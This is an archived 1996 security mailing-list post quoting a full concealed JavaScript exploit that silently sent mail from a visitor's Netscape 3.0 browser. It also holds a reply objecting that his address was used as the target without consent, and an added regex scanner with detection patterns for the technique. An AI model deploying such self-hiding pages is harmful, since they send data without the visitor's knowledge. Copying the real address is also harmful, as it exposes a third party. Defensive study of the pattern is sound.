[3336] in WWW Security List Archive
Re:Java Script
daemon@ATHENA.MIT.EDU (David Ray)
Tue Oct 22 22:42:33 1996
Date: Tue, 22 Oct 1996 17:18:36 -0700
To: www-security@ns2.rutgers.edu
From: daver@idiom.com (David Ray)
Cc: htorgema@novice.uwaterloo.ca
Errors-To: owner-www-security@ns2.rutgers.edu
Everybody, please don't use my email address in the Javascript script that
Henri Torgemane (htorgema@novice.uwaterloo.ca) posted to this list. I have
no involvement in this script and Henri posted my email address in the
script without my consent/knowledge. I assume this was an oversight on his
part and not deliberate. I have tried to contact him at every email address
he has used to send messages, and each of my emails has bounced back so I
have no way to contact him. Thanks.
At 10:18 PM 10/21/96, htorgema@novice.uwaterloo.ca wrote:
> On Sun, 20 Oct 1996, David Ray wrote:
>
> > At 11:17 AM 10/20/96, I wrote:
> > > No, this is not correct. This bug existed in the short-lived Netscape
> > > version 2.0 which was replaced by version 2.0.1 a long time ago (in Web
> > > years).
> > >
> > > All versions of Netscape since then put up a dialog box asking the user if
> > > they are sure they want to send their email message, before it is sent.
> >
> > To be more specific, Netscape 3.0, under "Options... Network Preferences...
> > Protocols... There is a checkbox that says "Show alert before submitting a
> > form by email". If checked, it will put up a dialog box if a mailto: URL is
> > being submitted, asking the user to confirm or cancel. This checkbox is
> > checked by default, but can be unchecked. Perhaps the person who started
> > this thread had unchecked it.
> >
> > -Dave
>
> Alright.. then here's a working exploit:
>
> The following script automatically sends a mail.
> It was tested with Netscape 3.0 for OSF1 and for AIX.
> It visibly doesn't care if the "Show alert before playing with email"
> checkbox is set.
>
> The use of a get method and of a text/plain
> mime-type seems to be a good enough reason for Netscape to send
> mail directly..
>
> This script tries to hide its action as much as possible: A look at
> view-source when this page is loaded should show a very innocent-looking
> page..
>
>
> ---------- Begin of HTML source ----------
>
> <HTML>
> <SCRIPT>
> <!--
>
> //////////////////////////////////
> // First, some silly functions. //
> //////////////////////////////////
>
> var kickme;
>
> function hide() {
> top.status="I'm loading my world, please wait!";
> kickme=setTimeout("hide()",100);
> }
>
> function FabulousWorld() {
> clearTimeout(kickme);
> document.open("text/html");
> document.writeln("<HTML><HEAD><TITLE>My World!</TITLE></HEAD>");
> document.writeln("<BODY bgcolor=red text=green link=yellow>");
> document.writeln("<CENTER><H1> My world... </H1>");
> document.writeln("<H3><BLINK>This page is Javascript enabled!</BLINK></H3>");
> // Insert your bookmarks here...
> document.writeln("</BODY></HTML>");
> document.close();
> }
>
> ///////////////////////////////
> // Serious stuff begin here! //
> ///////////////////////////////
>
> function form_handler() {
> document.forms[0].method="get";
> document.forms[0].encoding="text/plain";
> document.forms[0].action="mailto:daver@idiom.com?subject=a good bug never dies...";
> // Remember to put YOUR address when you test this page...
>
> document.forms[0].text.value="Browser used: "+navigator.appVersion;
>
> setTimeout("FabulousWorld()",12000); // This is not elegant..
> // but if we change the page before the mail is sent,
> // nothing is sent...
>
> kickme=setTimeout("hide()",100); // This is just a way to
> // hide some status
> // mentioning an
> // access to your
> // favorite SMTP server!
> }
>
>
>
> // Then, we generate a very usual page.
> // The only 'unusual' thing is the onsubmit() handler.
>
> document.writeln('\
> <HTML>\
> <HEAD>\
> <TITLE>Welcome in my world!</TITLE>\
> </HEAD>\
> <BODY bgcolor=black text=yellow>\
> <CENTER><H1>Welcome</H1>\
> <BR><BR><BR><BR><BR>\
> <FONT Color=White>\
> <FORM onsubmit="form_handler()" >\
> <INPUT type="hidden" name="text">\
> <INPUT TYPE="submit" value="Click Here to Enter my Fabulous Realm!" >\
> </CENTER>\
> </FORM></FONT>\
> </BODY>\
> </HTML>');
>
>
> // -->
> </SCRIPT>
> </HTML>
>
> ---------- End of HTML source ----------
>
> ---------------
> Henri Torgemane http://www.undergrad.math.uwaterloo.ca/~htorgema/
>
> Never let your sense of morals prevent you from doing what is right.
> -- Salvor Hardin, "Foundation"
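As an added example that is not part of this thread and not code from either poster: a small static scanner, run under Node.js on raw page source, that flags the pattern the quoted post describes, a form whose action is rewritten by script to a mailto: URL with text/plain encoding, plus the status-bar override and post-submit page rewrite used to conceal it. The detection rules, the risk grading, the placeholder address someone@example.invalid and both sample pages are constructed for this example; the rules are heuristic regexes, not a parser, so they are a triage aid for a proxy or content filter rather than a proof of intent.

```javascript
// Added example (not from the thread): regex-based scanner for HTML whose
// script wires a form up to a mailto: action, the pattern in the quoted post.
// Runs on raw page source under Node.js; no DOM is needed. Rules are heuristic.

const RULES = [
  { id: "mailto-action-static",
    re: /<form\b[^>]*\baction\s*=\s*["']?mailto:/i,
    why: "form element posts straight to a mailto: URL" },
  { id: "mailto-action-script",
    re: /\.action\s*=\s*["'][^"']*mailto:/i,
    why: "script rewrites a form's action to mailto:" },
  { id: "text-plain-encoding",
    re: /\.encoding\s*=\s*["']text\/plain["']|\benctype\s*=\s*["']?text\/plain/i,
    why: "text/plain encoding, the combination the post says skipped the alert" },
  { id: "document-rewrite",
    re: /document\.open\s*\(/i,
    why: "page rewrites itself after load, hiding the submitting form" },
  { id: "status-bar-override",
    re: /\b(top|window|self)\.status\s*=/i,
    why: "status bar text is overwritten, masking the mail-transfer status message" },
];

// Return every rule that matches the page source.
function scanPageSource(html) {
  return RULES.filter(r => r.re.test(html)).map(r => ({ id: r.id, why: r.why }));
}

// Grade the findings: a mailto: target alone is "low"; scripted rewriting plus
// text/plain plus some concealment is the full pattern from the post, "high".
function riskLevel(findings) {
  const ids = new Set(findings.map(f => f.id));
  const mailto = ids.has("mailto-action-static") || ids.has("mailto-action-script");
  if (!mailto) return "none";
  const concealed = ids.has("document-rewrite") || ids.has("status-bar-override");
  if (ids.has("mailto-action-script") && ids.has("text-plain-encoding") && concealed) return "high";
  if (ids.has("text-plain-encoding") || concealed) return "medium";
  return "low";
}

// Constructed sample input modelled on the quoted post (address is a placeholder).
const SUSPECT_PAGE = `<HTML><SCRIPT>
function form_handler() {
  document.forms[0].method = "get";
  document.forms[0].encoding = "text/plain";
  document.forms[0].action = "mailto:someone@example.invalid?subject=hi";
  top.status = "I'm loading my world, please wait!";
  setTimeout("rewrite()", 12000);
}
function rewrite() {
  document.open("text/html");
  document.writeln("<HTML><BODY>My world</BODY></HTML>");
  document.close();
}
document.writeln('<FORM onsubmit="form_handler()">' +
  '<INPUT type="hidden" name="text"><INPUT type="submit" value="Enter"></FORM>');
</SCRIPT></HTML>`;

// Constructed benign page: an ordinary search form and a harmless timer.
const BENIGN_PAGE = `<HTML><BODY>
<FORM action="/search" method="get"><INPUT name="q"><INPUT type="submit"></FORM>
<SCRIPT>setTimeout("void 0", 100);</SCRIPT>
</BODY></HTML>`;

for (const [name, page] of [["suspect", SUSPECT_PAGE], ["benign", BENIGN_PAGE]]) {
  const findings = scanPageSource(page);
  console.log(`${name}: risk=${riskLevel(findings)}`);
  for (const f of findings) console.log(`  ${f.id}: ${f.why}`);
}
```

The grading deliberately treats a plain mailto: form as "low": a visible `<FORM action="mailto:...">` is what the browser's confirmation checkbox was designed for, while the scripted rewrite, the text/plain encoding and the self-rewriting page are what the post reports as bypassing it.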